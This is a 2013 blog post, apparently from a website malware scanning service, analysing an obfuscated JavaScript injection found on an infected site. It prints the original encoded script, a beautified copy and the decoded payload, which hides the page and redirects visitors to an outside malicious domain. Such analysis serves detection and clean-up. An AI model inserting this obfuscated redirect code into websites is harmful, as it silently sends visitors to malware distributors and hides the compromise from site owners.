Sunday, April 21, 2013

Obfuscated redirect to malicious resource



Obfuscated malicious JavaScript code redirects to remote malicious resource

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to generate the URL during web page rendering. When accessing such web page it downloads content from remote malware distributor. This infected website hosts suspicious JavaScript code injected in files. 

Malicious action

Real time URL generation is often used to download malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Fri Apr 19 01:31:38 2013
Infected website's files: 2
Website malware scan report link: http://goo.gl/kmnTd

Sitescan report by Quttera's Online Website Malware Scanner
Website malware scanner sitescan report by Quttera


Malicious JavaScript detection by Quttera
Malicious JavaScript



Threat dump: [[<script type='text/javascript' language='javascript' >
// <![CDATA[
var OEtkdtANvKk = String.fromCharCode(  0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64, 101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105, 0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97, 075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156 );
 var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" + "%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" + "%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'")+OEtkdtANvKk+String.fromCharCode(  0x27, 59, 0x20, 0x7d );
 eval(msKKpuoJVPjXfi);
// ]]>

 </script>]]


Malware entry


Malware entry details.

Beautified script


  1. var OEtkdtANvKk = String.fromCharCode(0x68, 116, 0164, 0x70, 072, 057, 47, 98, 101, 0163, 0164, 0x61, 0x6e, 0x64,101, 0141, 0x73, 0151, 101, 115, 0164, 0x77, 0x61, 0x79, 0163, 116, 111, 0154, 0157, 0163, 0x65, 0167, 101, 105,0x67, 104, 116, 0x2e, 99, 111, 109, 057, 0x69, 0156, 0x64, 101, 120, 0x65, 0x72, 0x2e, 112, 0150, 0x70, 63, 97,075, 062, 50, 54, 0x38, 0x34, 53, 38, 0x63, 0x3d, 0167, 108, 0x5f, 0x63, 0x6f, 0156);
  2. var msKKpuoJVPjXfi = unescape("%69%66%20%28%77%69%6e" + "%64" + "%6f" + "%77%2e%6c%6f%63%61%74%69%6f" +"%6e%2e%68%61%73%68%20%3d%3d%20%22%23%77%79%76%6b%22%29%20%7b" + "%20%64%6f" + "%63%75%6d%65" +"%6e%74%2e%62%6f%64%79%2e%73" + "%74%79%6c%65%2e%64%69" + "%73%70%6c%61" + "%79" + "%3d%22%6e%6f%6e%65%22%3b" +"%20%77" + "%69%6e%64%6f%77%2e%6c%6f%63%61%74%69%6f" + "%6e%2e%68%72%65%66%20%3d%20\'") + OEtkdtANvKk +String.fromCharCode(0x27, 59, 0x20, 0x7d);
  3. eval(msKKpuoJVPjXfi);
  4.  


Malicious payload



Decoded payload generates redirection to malicious web resource



  1. if (window.location.hash == "#wyvk") {
  2.     document.body.style.display = "none";
  3.     window.location.href = 'http://bestandeasiestwaystoloseweight.com/indexer.php?a=226845&c=wl_con';
  4. }


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.